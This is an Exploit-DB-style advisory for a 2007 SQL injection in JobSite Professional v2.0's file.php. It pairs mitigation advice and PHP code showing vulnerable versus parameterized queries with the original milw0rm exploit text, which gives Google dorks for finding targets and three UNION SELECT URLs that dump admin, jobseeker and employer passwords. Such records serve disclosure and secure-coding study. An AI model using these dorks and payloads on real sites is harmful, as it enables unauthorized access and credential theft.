Vendor: JobSite Professional
Author: ZynbER
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote SQL Injection
CWE: 89
Product Name: JobSite Professional
Affected Version From: JobSite Professional v2.0
Affected Version To: JobSite Professional v2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

JobSite Professional v2.0 Remote SQL Injection Vulnerability

A SQL injection vulnerability in file.php (File.php?id=) allows remote attackers to execute arbitrary SQL commands via the id parameter, which can lead to unauthorized access and disclosure of sensitive information; the published queries read usernames and passwords from the application's admin, jobseeker and employer user tables, and no registration is needed to reach the vulnerable page.

Mitigation:

The vendor should validate user input (the id parameter should only ever be accepted as an integer) and use parameterized queries so that user-supplied values are bound as data and are never parsed as SQL. Regularly updating the software to the latest version is also recommended.
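The two patterns side by side, as an added example that is not JobSite Professional's own code: a file.php-style handler that splices the raw id into the query (the flaw described above) and a hardened version that validates the id as an integer and binds it with a PDO prepared statement. The table name `files`, its columns, the DSN and the credentials are assumptions.

```php
<?php
// Added example, not code from JobSite Professional. Assumed: file.php loads one
// record by ?id= from a hypothetical table `files`.

// --- Vulnerable pattern: the raw id is spliced into the SQL string ---
// A value such as "-1 UNION SELECT ..." becomes part of the statement itself,
// which is exactly what the advisory's payloads exploit.
function load_file_vulnerable(PDO $db, string $id): ?array
{
    $sql = "SELECT * FROM files WHERE id = $id";   // string interpolation: injectable
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardened pattern: validate the type, then bind the value ---
// 1. id must be a positive integer; anything else is rejected before SQL runs.
// 2. The statement uses a placeholder, so the bound value is data, never SQL.
function load_file_safe(PDO $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);   // "-1 UNION SELECT ..." never reaches the database
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, description FROM files WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage with hypothetical DSN and credentials.
$db = new PDO('mysql:host=localhost;dbname=jobsite', 'app_user', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // use real server-side prepared statements
]);
$row = load_file_safe($db, $_GET['id'] ?? '');
header('Content-Type: application/json');
echo json_encode($row ?? ['error' => 'not found']);
```

The integer check alone would stop this particular payload, but the prepared statement is the control that holds even when a parameter legitimately has to accept free text.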

Exploit-DB raw data:

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version  : inurl:index.php?page=fr_Candidats


## EXPLOITS :

Vulnerability in (File.php?id=)



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!



## GREETZ  :  MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-10-28]